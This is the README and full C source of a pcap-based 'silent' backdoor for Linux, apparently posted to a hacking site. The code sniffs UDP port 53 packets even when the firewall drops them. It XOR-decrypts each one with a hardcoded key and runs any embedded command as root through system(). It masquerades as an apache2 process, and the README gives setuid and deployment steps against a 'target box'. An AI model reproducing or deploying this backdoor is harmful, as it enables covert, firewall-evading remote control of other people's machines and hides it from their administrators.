Written in C
-[ Packet Sniffing Backdoor Example
-[ written by drraid at gmail dot com
-[ for dtors.ath.cx & drraid's sec labs
--
-[ big middle finger to microsoft
-[ GNU GPL'd code
This is a dirty tool. A poorly written dirty tool ...
(im sorry there are almost no comments in it). Just say no.
The key with this program is demonstate a connectionless backdoor that
gets past the local netfilter running on a linux box
Many people said I was full of shit when I told them a packet sniffer
will read packets even if netfilter drops them. With that in mind, if
a packet sniffer were to sniff for commands, and run them as a backdoor
it could be sneaky evil ninja. No connection would be noticed, and
even if the local firewall dropped the packet containing its commands,
it would still do its duty. Now what if you encrypted it so someone
else sniffing wouldnt know what the packet was supposed to be intended for?
This tool is not written well. It is not in its entirity and I am
aware of several bugs it has. I have left it this way and posted it
because it does function -- i would strongly recommend not using it
without re-writing or making changes.
Requirements:
Linux (untested on other systems)
GCC
libpcap and libnet
Compiling:
$ ./makedoor
$ ./makekey
*Should build two files*: silence and key
then:
# chmod +s silence
Running:
# ./silence &
the above runs the backdoor: note it changes its process base name to:
/usr/sbin/apache2 -k start -DSSL
This is set by #define BASENAME in silentdoor.c
If anything prints on the screen when ran, ie: '<' character
then the backdoor failed (probably because you weren't root)
Using the key:
# ./key ip.ip.ip.ip:53 "command to exec"
runs the command. HERES THE CATCH: all output is printed to stdout
of the remote machine. ITS OUTPUTTED ON YOUR TARGET BOX -- someone will
notice if you start causin issues. This is one of those bugs ;D
Another is if you run a program like 'login' for the command to exec
you will probably lose control of the backdoor until/if it restarts
CONCLUSION:
It is possible to have a pcap based backdoor.
This stuff is GNU GPL
and it is included in the folder with the sources n stuff.
contact: drraid [at] gmail
SOURCE
/*
PCAP-BASED SNIFFING BACKDOOR
"Silent Backdoor" -- connectionless
written by drraid, drraid @ gmail
Reads from encrypted UDP port 53 packet,
even if the packet is dropped by local firewall >;]
This is horrible code. It functions but is buggy.
Meant more as a 'demo'. Read the README
yo sup to 503, dtors.ath.cx, syncrew, #coder-underground,
bash, kaptin, vershun, poof, maru and other crazy bastards
as always, BIG MIDDLE FINGER TO MICROSOFT
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pcap.h>
#include <netdb.h>
#define PASS "leet"
#define BASENAME "/usr/sbin/apache2 -k start -DSSL"
void in_pkt(u_char *other_stuff, const struct pcap_pkthdr* pkt_head, const u_char* packet)
{
int i, x, v;
char *ptr1, *ptr2, *ptr3;
char pktstore[1024];
char tempbuf[1024];
char decrypts[1024];
memset(tempbuf, '\0', sizeof(tempbuf));
memset(pktstore, '\0', sizeof(pktstore));
memset(decrypts, '\0', sizeof(decrypts));
v = (pkt_head->caplen - 44);
memcpy(pktstore, packet+44, (v=(v < (sizeof(pktstore)-1)?v:(sizeof(pktstore)-1))));
for (i = 0; i <= (v+(v%4)); i+=4)
strncat(tempbuf, PASS, 4);
for (i = 0; i < v; ++i)
{
decrypts[i]=(pktstore[i] ^ tempbuf[i]);
}
if (NULL != (ptr1=strstr(decrypts, "-dc$")))
{
if (NULL != (ptr2=strstr(ptr1, "$dc")))
{
memset(tempbuf, '\0', sizeof(tempbuf));
strncpy(tempbuf, ptr1+4, (ptr2 - (ptr1 + 4)));
system(tempbuf);
}
}
}
int catchpacket(void )
{
char errbuf[PCAP_ERRBUF_SIZE];
char filter_string[]="udp port 53";
pcap_t *sniff_session;
struct pcap_pkthdr pkt_head;
struct bpf_program filter;
const char *payload;
u_char *packet;
int pkt_adlen;
u_char *p_info;
bpf_u_int32 mask;
bpf_u_int32 net;
if (-1 == pcap_lookupnet(NULL, &net, &mask, errbuf))
{
printf("\n<\n");
exit(0);
}
if ((sniff_session=pcap_open_live(NULL, BUFSIZ, 1, 0, errbuf))==NULL)
{
printf("\n<\n");
exit(0);
}
pcap_compile(sniff_session, &filter, filter_string, 0, net);
pcap_setfilter(sniff_session, &filter);
pcap_loop(sniff_session, 0, in_pkt, 0);
return(0);
}
int main(int argc, char *argv[])
{
int x;
strcpy(argv[0], BASENAME);
setuid(0);
setgid(0);
x=catchpacket();
return (0);
}
MegaSecurity